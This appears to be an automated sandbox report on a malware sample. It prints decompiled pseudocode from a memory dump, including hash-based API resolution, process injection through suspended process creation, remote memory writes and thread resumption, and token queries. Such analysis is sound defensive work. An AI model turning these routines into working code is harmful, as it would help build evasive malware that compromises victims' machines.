                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                                    • String ID:
                                    • API String ID: 1267121359-0
                                    • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                                    • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                                    • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                                    • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E1000DFAD(void* __ecx, intOrPtr __edx) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v92;
                                    				intOrPtr _t41;
                                    				signed int _t47;
                                    				signed int _t49;
                                    				signed int _t51;
                                    				void* _t56;
                                    				struct HINSTANCE__* _t58;
                                    				_Unknown_base(*)()* _t59;
                                    				intOrPtr _t60;
                                    				void* _t62;
                                    				intOrPtr _t63;
                                    				void* _t69;
                                    				char _t70;
                                    				void* _t75;
                                    				CHAR* _t80;
                                    				void* _t82;
                                    
                                    				_t75 = __ecx;
                                    				_v12 = __edx;
                                    				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                    				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                    				if(_t41 == 0) {
                                    					L4:
                                    					return 0;
                                    				}
                                    				_t62 = _t41 + __ecx;
                                    				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                    				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                    				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                    				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                    				_t47 = 0;
                                    				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                    				_v8 = 0;
                                    				_v16 = _t63;
                                    				if(_t63 == 0) {
                                    					goto L4;
                                    				} else {
                                    					goto L2;
                                    				}
                                    				while(1) {
                                    					L2:
                                    					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                    					_t51 = _v8;
                                    					if((_t49 ^ 0x218fe95b) == _v12) {
                                    						break;
                                    					}
                                    					_t73 = _v20;
                                    					_t47 = _t51 + 1;
                                    					_v8 = _t47;
                                    					if(_t47 < _v16) {
                                    						continue;
                                    					}
                                    					goto L4;
                                    				}
                                    				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                    				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                    				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                    					return _t80;
                                    				} else {
                                    					_t56 = 0;
                                    					while(1) {
                                    						_t70 = _t80[_t56];
                                    						if(_t70 == 0x2e || _t70 == 0) {
                                    							break;
                                    						}
                                    						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                    						_t56 = _t56 + 1;
                                    						if(_t56 < 0x40) {
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                    					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                    					if( *((char*)(_t56 + _t80)) != 0) {
                                    						_t80 =  &(( &(_t80[1]))[_t56]);
                                    					}
                                    					_t40 =  &_v92; // 0x6c6c642e
                                    					_t58 = LoadLibraryA(_t40); // executed
                                    					if(_t58 == 0) {
                                    						goto L4;
                                    					}
                                    					_t59 = GetProcAddress(_t58, _t80);
                                    					if(_t59 == 0) {
                                    						goto L4;
                                    					}
                                    					return _t59;
                                    				}
                                    			}


























                                    APIs
                                    • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                                    • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: .dll
                                    • API String ID: 2574300362-2738580789
                                    • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                                    • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                                    • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                                    • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E1000CA25(intOrPtr __edx) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				void* _v36;
                                    				char _v40;
                                    				char _v80;
                                    				char _t37;
                                    				intOrPtr _t38;
                                    				void* _t45;
                                    				intOrPtr _t47;
                                    				intOrPtr _t48;
                                    				intOrPtr _t50;
                                    				intOrPtr _t52;
                                    				void* _t54;
                                    				intOrPtr _t57;
                                    				long _t61;
                                    				intOrPtr _t62;
                                    				signed int _t65;
                                    				signed int _t68;
                                    				signed int _t82;
                                    				void* _t85;
                                    				char _t86;
                                    
                                    				_v8 = _v8 & 0x00000000;
                                    				_v20 = __edx;
                                    				_t65 = 0;
                                    				_t37 = E1000C8FD( &_v8);
                                    				_t86 = _t37;
                                    				_v24 = _t86;
                                    				_t87 = _t86;
                                    				if(_t86 == 0) {
                                    					return _t37;
                                    				}
                                    				_t38 =  *0x1001e688; // 0x7900590
                                    				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
                                    				_t82 = _v8;
                                    				_t68 = 0;
                                    				_v16 = 0;
                                    				if(_t82 == 0) {
                                    					L20:
                                    					E1000861A( &_v24, 0);
                                    					return _t65;
                                    				}
                                    				while(_t65 == 0) {
                                    					while(_t65 == 0) {
                                    						asm("stosd");
                                    						asm("stosd");
                                    						asm("stosd");
                                    						asm("stosd");
                                    						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
                                    						_t92 = _t45;
                                    						if(_t45 >= 0) {
                                    							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
                                    							if(_t54 != 0) {
                                    								_t57 =  *0x1001e684; // 0x797faa0
                                    								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
                                    								if(_t85 != 0) {
                                    									GetLastError();
                                    									_t61 = ResumeThread(_v36);
                                    									_t62 =  *0x1001e684; // 0x797faa0
                                    									if(_t61 != 0) {
                                    										_push(0xea60);
                                    										_push(_t85);
                                    										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
                                    											_t65 = _t65 + 1;
                                    										}
                                    										_t62 =  *0x1001e684; // 0x797faa0
                                    									}
                                    									CloseHandle(_t85);
                                    								}
                                    							}
                                    						}
                                    						if(_v40 != 0) {
                                    							if(_t65 == 0) {
                                    								_t52 =  *0x1001e684; // 0x797faa0
                                    								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
                                    							}
                                    							_t48 =  *0x1001e684; // 0x797faa0
                                    							 *((intOrPtr*)(_t48 + 0x30))(_v36);
                                    							_t50 =  *0x1001e684; // 0x797faa0
                                    							 *((intOrPtr*)(_t50 + 0x30))(_v40);
                                    						}
                                    						_t68 = _v16;
                                    						_t47 = _v12 + 1;
                                    						_v12 = _t47;
                                    						if(_t47 < 2) {
                                    							continue;
                                    						} else {
                                    							break;
                                    						}
                                    					}
                                    					_t82 = _v8;
                                    					_t68 = _t68 + 1;
                                    					_v16 = _t68;
                                    					if(_t68 < _t82) {
                                    						continue;
                                    					} else {
                                    						break;
                                    					}
                                    					do {
                                    						goto L19;
                                    					} while (_t82 != 0);
                                    					goto L20;
                                    				}
                                    				L19:
                                    				E1000861A(_t86, 0xfffffffe);
                                    				_t86 = _t86 + 4;
                                    				_t82 = _t82 - 1;
                                    			}




























                                    APIs
                                      • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                                      • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                                      • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                                      • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                                      • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                                      • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                                      • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                                    • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                                    • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                                    • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                                    • String ID:
                                    • API String ID: 1274669455-0
                                    • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                                    • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                                    • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                                    • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _t12;
                                    				void* _t20;
                                    				void* _t22;
                                    				union _TOKEN_INFORMATION_CLASS _t28;
                                    				void* _t31;
                                    
                                    				_push(_t22);
                                    				_push(_t22);
                                    				_t31 = 0;
                                    				_t28 = __edx;
                                    				_t20 = _t22;
                                    				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                    					L6:
                                    					_t12 = _t31;
                                    				} else {
                                    					_t31 = E10008604(_v8);
                                    					_v12 = _t31;
                                    					if(_t31 != 0) {
                                    						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                    							goto L6;
                                    						} else {
                                    							E1000861A( &_v12, _t16);
                                    							goto L3;
                                    						}
                                    					} else {
                                    						L3:
                                    						_t12 = 0;
                                    					}
                                    				}
                                    				return _t12;
                                    			}











                                    APIs
                                    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                                    • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InformationToken$AllocErrorHeapLast
                                    • String ID:
                                    • API String ID: 4258577378-0
                                    • Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                                    • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                                    • Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                                    • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 47%
                                    			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                    				struct _STARTUPINFOW _v72;
                                    				signed int _t11;
                                    				WCHAR* _t15;
                                    				int _t19;
                                    				struct _PROCESS_INFORMATION* _t20;
                                    
                                    				_t20 = __edx;
                                    				_t15 = __ecx;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t19 = 0x44;
                                    				memset( &_v72, 0, _t19);
                                    				_v72.cb = _t19;
                                    				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
                                    				asm("sbb eax, eax");
                                    				return  ~( ~_t11) - 1;
                                    			}









                                    APIs
                                    • memset.MSVCRT ref: 1000AE85
                                    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateProcessmemset
                                    • String ID:
                                    • API String ID: 2296119082-0
                                    • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                                    • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                                    • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                                    • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 47%
                                    			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                                    				char _v8;
                                    				char _t5;
                                    				struct HINSTANCE__* _t7;
                                    				void* _t10;
                                    				void* _t12;
                                    				void* _t22;
                                    				void* _t25;
                                    
                                    				_push(__ecx);
                                    				_t12 = __ecx;
                                    				_t22 = __edx;
                                    				_t5 = E100095C7(_a4);
                                    				_t25 = 0;
                                    				_v8 = _t5;
                                    				_push(_t5);
                                    				if(_a4 != 0x7c3) {
                                    					_t7 = LoadLibraryA(); // executed
                                    				} else {
                                    					_t7 = GetModuleHandleA();
                                    				}
                                    				if(_t7 != 0) {
                                    					_t10 = E1000E171(_t12, _t22, _t7); // executed
                                    					_t25 = _t10;
                                    				}
                                    				E100085C2( &_v8);
                                    				return _t25;
                                    			}











                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
                                    • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 4133054770-0
                                    • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                    • Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
                                    • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                    • Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
                                    				CHAR* _v8;
                                    				int _t28;
                                    				signed int _t31;
                                    				signed int _t34;
                                    				signed int _t35;
                                    				void* _t38;
                                    				signed int* _t41;
                                    
                                    				_t41 = _a8;
                                    				_t31 = 0;
                                    				if(_t41[1] > 0) {
                                    					_t38 = 0;
                                    					do {
                                    						_t3 =  &(_t41[2]); // 0xe6840d8b
                                    						_t34 =  *_t3;
                                    						_t35 = 0;
                                    						_a8 = 0;
                                    						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
                                    							_v8 = _a4 + 0x24;
                                    							while(1) {
                                    								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
                                    								_t14 =  &(_t41[2]); // 0xe6840d8b
                                    								_t34 =  *_t14;
                                    								if(_t28 == 0) {
                                    									break;
                                    								}
                                    								_t35 = _a8 + 1;
                                    								_a8 = _t35;
                                    								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
                                    									continue;
                                    								} else {
                                    								}
                                    								goto L8;
                                    							}
                                    							 *_t41 =  *_t41 |  *(_t34 + _t38);
                                    						}
                                    						L8:
                                    						_t31 = _t31 + 1;
                                    						_t38 = _t38 + 0x10;
                                    						_t20 =  &(_t41[1]); // 0x1374ff85
                                    					} while (_t31 <  *_t20);
                                    				}
                                    				Sleep(0xa);
                                    				return 1;
                                    			}

                                    APIs
                                    • lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                                    • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Sleeplstrcmpi
                                    • String ID:
                                    • API String ID: 1261054337-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E10005E96() {
                                    				intOrPtr _t3;
                                    
                                    				_t3 =  *0x1001e684; // 0x797faa0
                                    				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
                                    				ExitProcess(0);
                                    			}

                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E100085EF() {
                                    				void* _t1;
                                    
                                    				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                    				 *0x1001e768 = _t1;
                                    				return _t1;
                                    			}

                                    APIs
                                    • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeap
                                    • String ID:
                                    • API String ID: 10892065-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 50%
                                    			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				void* _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				signed int _v44;
                                    				char _v48;
                                    				char _v52;
                                    				intOrPtr _v56;
                                    				signed int _v60;
                                    				char* _v72;
                                    				signed short _v80;
                                    				signed int _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				intOrPtr _v100;
                                    				char _v104;
                                    				char _v616;
                                    				intOrPtr* _t159;
                                    				char _t165;
                                    				signed int _t166;
                                    				signed int _t173;
                                    				signed int _t178;
                                    				signed int _t186;
                                    				intOrPtr* _t187;
                                    				signed int _t188;
                                    				signed int _t192;
                                    				intOrPtr* _t193;
                                    				intOrPtr _t200;
                                    				intOrPtr* _t205;
                                    				signed int _t207;
                                    				signed int _t209;
                                    				intOrPtr* _t210;
                                    				intOrPtr _t212;
                                    				intOrPtr* _t213;
                                    				signed int _t214;
                                    				char _t217;
                                    				signed int _t218;
                                    				signed int _t219;
                                    				signed int _t230;
                                    				signed int _t235;
                                    				signed int _t242;
                                    				signed int _t243;
                                    				signed int _t244;
                                    				signed int _t245;
                                    				intOrPtr* _t247;
                                    				intOrPtr* _t251;
                                    				signed int _t252;
                                    				intOrPtr* _t253;
                                    				void* _t255;
                                    				intOrPtr* _t261;
                                    				signed int _t262;
                                    				signed int _t283;
                                    				signed int _t289;
                                    				char* _t298;
                                    				void* _t320;
                                    				signed int _t322;
                                    				intOrPtr* _t323;
                                    				intOrPtr _t324;
                                    				signed int _t327;
                                    				intOrPtr* _t328;
                                    				intOrPtr* _t329;
                                    
                                    				_v32 = _v32 & 0x00000000;
                                    				_v60 = _v60 & 0x00000000;
                                    				_v56 = __edx;
                                    				_v100 = __ecx;
                                    				_t159 = E1000D523(__ecx);
                                    				_t251 = _t159;
                                    				_v104 = _t251;
                                    				if(_t251 == 0) {
                                    					return _t159;
                                    				}
                                    				_t320 = E10008604(0x10);
                                    				_v36 = _t320;
                                    				_pop(_t255);
                                    				if(_t320 == 0) {
                                    					L53:
                                    					E1000861A( &_v60, 0xfffffffe);
                                    					E1000D5D7( &_v104);
                                    					return _t320;
                                    				}
                                    				_t165 = E100095E1(_t255, 0x536);
                                    				 *_t328 = 0x609;
                                    				_v52 = _t165;
                                    				_t166 = E100095E1(_t255);
                                    				_push(0);
                                    				_push(_v56);
                                    				_v20 = _t166;
                                    				_push(_t166);
                                    				_push(_a4);
                                    				_t322 = E100092E5(_t165);
                                    				_v60 = _t322;
                                    				E100085D5( &_v52);
                                    				E100085D5( &_v20);
                                    				_t329 = _t328 + 0x20;
                                    				if(_t322 != 0) {
                                    					_t323 = __imp__#2;
                                    					_v40 =  *_t323(_t322);
                                    					_t173 = E100095E1(_t255, 0x9e4);
                                    					_v20 = _t173;
                                    					_v52 =  *_t323(_t173);
                                    					E100085D5( &_v20);
                                    					_t324 = _v40;
                                    					_t261 =  *_t251;
                                    					_t252 = 0;
                                    					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                    					__eflags = _t178;
                                    					if(_t178 != 0) {
                                    						L52:
                                    						__imp__#6(_t324);
                                    						__imp__#6(_v52);
                                    						goto L53;
                                    					}
                                    					_t262 = _v32;
                                    					_v28 = 0;
                                    					_v20 = 0;
                                    					__eflags = _t262;
                                    					if(_t262 == 0) {
                                    						L49:
                                    						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                    						__eflags = _t252;
                                    						if(_t252 == 0) {
                                    							E1000861A( &_v36, 0);
                                    							_t320 = _v36;
                                    						} else {
                                    							 *(_t320 + 8) = _t252;
                                    							 *_t320 = E100091E3(_v100);
                                    							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
                                    						}
                                    						goto L52;
                                    					} else {
                                    						goto L6;
                                    					}
                                    					while(1) {
                                    						L6:
                                    						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                    						__eflags = _t186;
                                    						if(_t186 != 0) {
                                    							break;
                                    						}
                                    						_v16 = 0;
                                    						_v48 = 0;
                                    						_v12 = 0;
                                    						_v24 = 0;
                                    						__eflags = _v84;
                                    						if(_v84 == 0) {
                                    							break;
                                    						}
                                    						_t187 = _v28;
                                    						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                    						__eflags = _t188;
                                    						if(_t188 >= 0) {
                                    							__imp__#20(_v24, 1,  &_v16);
                                    							__imp__#19(_v24, 1,  &_v48);
                                    							_t46 = _t320 + 0xc; // 0xc
                                    							_t253 = _t46;
                                    							_t327 = _t252 << 3;
                                    							_t47 = _t327 + 8; // 0x8
                                    							_t192 = E10008698(_t327, _t47);
                                    							__eflags = _t192;
                                    							if(_t192 == 0) {
                                    								__imp__#16(_v24);
                                    								_t193 = _v28;
                                    								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                    								L46:
                                    								_t252 = _v20;
                                    								break;
                                    							}
                                    							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                    							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
                                    							_t200 =  *_t253;
                                    							__eflags =  *(_t327 + _t200 + 4);
                                    							if( *(_t327 + _t200 + 4) == 0) {
                                    								_t136 = _t320 + 0xc; // 0xc
                                    								E1000861A(_t136, 0);
                                    								E1000861A( &_v36, 0);
                                    								__imp__#16(_v24);
                                    								_t205 = _v28;
                                    								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                    								_t320 = _v36;
                                    								goto L46;
                                    							}
                                    							_t207 = _v16;
                                    							while(1) {
                                    								_v12 = _t207;
                                    								__eflags = _t207 - _v48;
                                    								if(_t207 > _v48) {
                                    									break;
                                    								}
                                    								_v44 = _v44 & 0x00000000;
                                    								_t209 =  &_v12;
                                    								__imp__#25(_v24, _t209,  &_v44);
                                    								__eflags = _t209;
                                    								if(_t209 < 0) {
                                    									break;
                                    								}
                                    								_t212 = E100091E3(_v44);
                                    								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                    								_t213 = _v28;
                                    								_t281 =  *_t213;
                                    								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                    								__eflags = _t214;
                                    								if(_t214 < 0) {
                                    									L39:
                                    									__imp__#6(_v44);
                                    									_t207 = _v12 + 1;
                                    									__eflags = _t207;
                                    									continue;
                                    								}
                                    								_v92 = E100095E1(_t281, 0x250);
                                    								 *_t329 = 0x4cc;
                                    								_t217 = E100095E1(_t281);
                                    								_t283 = _v80;
                                    								_v96 = _t217;
                                    								_t218 = _t283 & 0x0000ffff;
                                    								__eflags = _t218 - 0xb;
                                    								if(__eflags > 0) {
                                    									_t219 = _t218 - 0x10;
                                    									__eflags = _t219;
                                    									if(_t219 == 0) {
                                    										L35:
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                                    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                    										__eflags = _t289;
                                    										if(_t289 == 0) {
                                    											L38:
                                    											E100085D5( &_v92);
                                    											E100085D5( &_v96);
                                    											__imp__#9( &_v80);
                                    											goto L39;
                                    										}
                                    										_push(_v72);
                                    										_push(L"%d");
                                    										L37:
                                    										_push(0xc);
                                    										_push(_t289);
                                    										E10009640();
                                    										_t329 = _t329 + 0x10;
                                    										goto L38;
                                    									}
                                    									_t230 = _t219 - 1;
                                    									__eflags = _t230;
                                    									if(_t230 == 0) {
                                    										L33:
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                                    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                    										__eflags = _t289;
                                    										if(_t289 == 0) {
                                    											goto L38;
                                    										}
                                    										_push(_v72);
                                    										_push(L"%u");
                                    										goto L37;
                                    									}
                                    									_t235 = _t230 - 1;
                                    									__eflags = _t235;
                                    									if(_t235 == 0) {
                                    										goto L33;
                                    									}
                                    									__eflags = _t235 == 1;
                                    									if(_t235 == 1) {
                                    										goto L33;
                                    									}
                                    									L28:
                                    									__eflags = _t283 & 0x00002000;
                                    									if((_t283 & 0x00002000) == 0) {
                                    										_v88 = E100095E1(_t283, 0x219);
                                    										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                    										E100085D5( &_v88);
                                    										_t329 = _t329 + 0x18;
                                    										_t298 =  &_v616;
                                    										L31:
                                    										_t242 = E100091E3(_t298);
                                    										L32:
                                    										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                    										goto L38;
                                    									}
                                    									_t242 = E1000DA20( &_v80);
                                    									goto L32;
